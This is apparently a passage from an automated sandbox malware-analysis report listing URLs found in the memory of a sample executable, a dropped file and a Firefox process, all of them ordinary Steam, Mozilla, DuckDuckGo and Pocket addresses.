Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2713381738.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2713381738.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2713381738.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001A.00000002.2927621655.000002EE64BC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2782030739.000002EE653E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2936846123.000002EE653E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2216206889.00000000055AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2850784469.000002EE581AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2928343018.000002EE64C9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2896845341.000002EE5E6D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE604D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001A.00000003.2728228279.000002EE64E12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2729720776.000002EE64E1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2726795602.000002EE64E23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2941379352.00000C05D3904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2681144026.000002EE5CB10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2687584651.000002EE5CB53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2885095805.000002EE5D97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2792367692.000002EE5D97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2804931449.000002EE5D293000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2905856189.000002EE5EF4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001A.00000002.2910556312.000002EE5F5CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2191583956.00000000055E4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2191486306.00000000055E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sVALIDATE_DONT_COLLAPSE
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C487000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000003.2779151506.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001A.00000003.2779151506.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2778146878.000002EE5DBBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DBA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2780374818.000002EE5DB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2770726535.000002EE5DB8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2791936031.000002EE5DC43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2856886597.000002EE59200000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2792367692.000002EE5D97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
